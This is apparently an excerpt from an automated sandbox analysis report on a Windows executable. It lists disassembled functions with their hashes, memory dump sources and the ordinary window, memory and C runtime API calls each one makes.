                                                                                                                    • Opcode Fuzzy Hash: edb626a2c553d05657fd421bd2057d28a73b96dff38c9fd26bd9b556afcd0859
                                                                                                                    • Instruction Fuzzy Hash: DEE144755083948FC314CF29D88086ABFF0AF9E300F49099EF9D497352D635EA59DBA2
                                                                                                                    Function 00B94088 Relevance: .3, Instructions: 270COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: 107e9c8534a7f6c7dacf0f88da3d047f701d5b416f00139c5c8cf51ea9b1b865
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 849144B02143499BDF28EF74D891FBA77D5EBA0300F1009BDE59687282EB749946C762
                                                                                                                    Function 00B943BF Relevance: .2, Instructions: 243COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction ID: 3a6789debb338236cf951a64f6b87c1f525672977e156f3ac373b5d8ae5d9562
                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction Fuzzy Hash: 288108B13043465BEF24DE68C8D1FBD77D4EBA5304F0049BDE9868B382DB648986C752
                                                                                                                    Function 00BA51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3cd9999319ad2183ac3688e75921895e446d2c4c11b93beef349bccb2b7e4ada
                                                                                                                    • Instruction ID: b9493f6244310761f6c501d8b50720f1f1188095dfd63108aab734a7e04e8a7a
                                                                                                                    • Opcode Fuzzy Hash: 3cd9999319ad2183ac3688e75921895e446d2c4c11b93beef349bccb2b7e4ada
                                                                                                                    • Instruction Fuzzy Hash: D2619C7160CF0867DE389A68A8D57BE63D4EF83340F1405DAE583DF282D6A1DF468719
                                                                                                                    Function 00BA4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction ID: 0c060fc7d0478bba95f24232a02820e362a797c65af5634d7c299e018f1216b1
                                                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction Fuzzy Hash: EA51587160CF446BDF344A688996BBF63D9DB53300F1808DAE887DB282D656EF45C3A1
                                                                                                                    Function 00B8EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2d495a1bf34e2dc33e6feee9a998d7c7ad9b0b9a74438ad05fa6d9504b20c2b3
                                                                                                                    • Instruction ID: bc538304ee6fe0c77365ccf82a8efd13def5dd24660f0952e22a011f7c4cd9f5
                                                                                                                    • Opcode Fuzzy Hash: 2d495a1bf34e2dc33e6feee9a998d7c7ad9b0b9a74438ad05fa6d9504b20c2b3
                                                                                                                    • Instruction Fuzzy Hash: C251C7355093D68FC711EF28C1444BEBFE0AE9A314F4909EDE4D95B253D221DA4ACB62
                                                                                                                    Function 00B900B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17f0824a8f84f2fbffda54a639fa47f5bb4c749ff3580f8d4fcff444817f604f
                                                                                                                    • Instruction ID: b50b50c2e8caf3836a66043c4659671573f25b1b52f3c3c5d6c20fd690d3ef03
                                                                                                                    • Opcode Fuzzy Hash: 17f0824a8f84f2fbffda54a639fa47f5bb4c749ff3580f8d4fcff444817f604f
                                                                                                                    • Instruction Fuzzy Hash: E951DFB1A087159FC748CF19D88055AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                                                    Function 00B93E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction ID: c3ac5fb68c87017ee14f406376340679f22823858df4262c3bcf62de63ac2b13
                                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction Fuzzy Hash: 2D31E7B1A147468FCB14EF28C89126ABBE0FB95704F14456DE495C7741C735EA0ACB92
                                                                                                                    Function 00B8E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B8E30E
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                      • Part of subcall function 00B91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BC1030,00000200,00B8D928,00000000,?,00000050,00BC1030), ref: 00B91DC4
                                                                                                                    • _strlen.LIBCMT ref: 00B8E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,00BBE274,?), ref: 00B8E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B8E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B8E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B8E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B8E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B8E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00B8E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00B8E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B8E51B
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00B8E58D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                    • Opcode ID: 95da716acb25d211dfb0010f856ba3c30de88cf5368e0757b735e7c36809e463
                                                                                                                    • Instruction ID: 232d7f5dde22331c82ef07dcbad4a7de22dd380cb904dbee5f2be3dec6c4c4ea
                                                                                                                    • Opcode Fuzzy Hash: 95da716acb25d211dfb0010f856ba3c30de88cf5368e0757b735e7c36809e463
                                                                                                                    • Instruction Fuzzy Hash: 26819271108341AFD710EF68CD89A6FBBE9EB89704F04095DF995E7260D670E905CB52
                                                                                                                    Function 00BACB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00BACB66
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC71E
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC730
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC742
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC754
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC766
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC778
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC78A
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC79C
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7AE
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7C0
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7D2
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7E4
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7F6
                                                                                                                    • _free.LIBCMT ref: 00BACB5B
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BACB7D
                                                                                                                    • _free.LIBCMT ref: 00BACB92
                                                                                                                    • _free.LIBCMT ref: 00BACB9D
                                                                                                                    • _free.LIBCMT ref: 00BACBBF
                                                                                                                    • _free.LIBCMT ref: 00BACBD2
                                                                                                                    • _free.LIBCMT ref: 00BACBE0
                                                                                                                    • _free.LIBCMT ref: 00BACBEB
                                                                                                                    • _free.LIBCMT ref: 00BACC23
                                                                                                                    • _free.LIBCMT ref: 00BACC2A
                                                                                                                    • _free.LIBCMT ref: 00BACC47
                                                                                                                    • _free.LIBCMT ref: 00BACC5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    • Opcode ID: b40d1ee7e472aa623f1eefd22b48ac691be7ec088e7e2d211d2ae2b051c36b34
                                                                                                                    • Instruction ID: 87f4a10e65453ad3a68f7ef6427b160b1b1174be46493882e88b8a94af42dafa
                                                                                                                    • Opcode Fuzzy Hash: b40d1ee7e472aa623f1eefd22b48ac691be7ec088e7e2d211d2ae2b051c36b34
                                                                                                                    • Instruction Fuzzy Hash: 653173716083099FEB20AA38D846B5ABBE9EF12320F5054ADF198D7591DF31EC40CB60
                                                                                                                    Function 00B99711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B99736
                                                                                                                    • _wcslen.LIBCMT ref: 00B997D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00B997E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B99806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B9982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                    • Opcode ID: 6a955d84e111263093c153d92ab96bd200e82a9382909d030075c4581814882b
                                                                                                                    • Instruction ID: 97beecd487806f0f5bf696b60986f4ae4903d68e32a7c29053fef71e5f1e5dd8
                                                                                                                    • Opcode Fuzzy Hash: 6a955d84e111263093c153d92ab96bd200e82a9382909d030075c4581814882b
                                                                                                                    • Instruction Fuzzy Hash: E431253250C7017BEB25AF689C86FAB77DCEF52750F1401EEF501961D2EFA49A0483A6
                                                                                                                    Function 00B9D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00B9D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00B9D6ED
                                                                                                                      • Part of subcall function 00B91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B8C116,00000000,.exe,?,?,00000800,?,?,?,00B98E3C), ref: 00B91FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B9D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B9D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B9D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00B9D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    • Opcode ID: c29b4dd8b872d29b6135176b4a3cec6bb7ff495803de4e894c7213472f4fd612
                                                                                                                    • Instruction ID: 3a116713cb1312014ca3856b142e9e22e1acff6b828f3d377ac7f43f54ffaaa3
                                                                                                                    • Opcode Fuzzy Hash: c29b4dd8b872d29b6135176b4a3cec6bb7ff495803de4e894c7213472f4fd612
                                                                                                                    • Instruction Fuzzy Hash: 7211E4722403507BEA216BB19C8EFAF76DCEB54B51F014170FA51BB092DA68CE0546B6
                                                                                                                    Function 00BA96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BA9705
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BA9711
                                                                                                                    • _free.LIBCMT ref: 00BA971C
                                                                                                                    • _free.LIBCMT ref: 00BA9727
                                                                                                                    • _free.LIBCMT ref: 00BA9732
                                                                                                                    • _free.LIBCMT ref: 00BA973D
                                                                                                                    • _free.LIBCMT ref: 00BA9748
                                                                                                                    • _free.LIBCMT ref: 00BA9753
                                                                                                                    • _free.LIBCMT ref: 00BA975E
                                                                                                                    • _free.LIBCMT ref: 00BA976C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: d2fd74d7e65d1c9a68f603b8135f3fc0bcadf72b8e7e24dfea5794cd4258c716
                                                                                                                    • Instruction ID: 36b88528f251bfb858e9830a7cfe88cbcd80dd4f7700e29fe129c347ea09dc8f
                                                                                                                    • Opcode Fuzzy Hash: d2fd74d7e65d1c9a68f603b8135f3fc0bcadf72b8e7e24dfea5794cd4258c716
                                                                                                                    • Instruction Fuzzy Hash: 0D11B3B6514109BFCB01EFA4C882CDD3BB5EF15350B5154E9FA488F662DE32EE509B84
                                                                                                                    Function 00BA2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
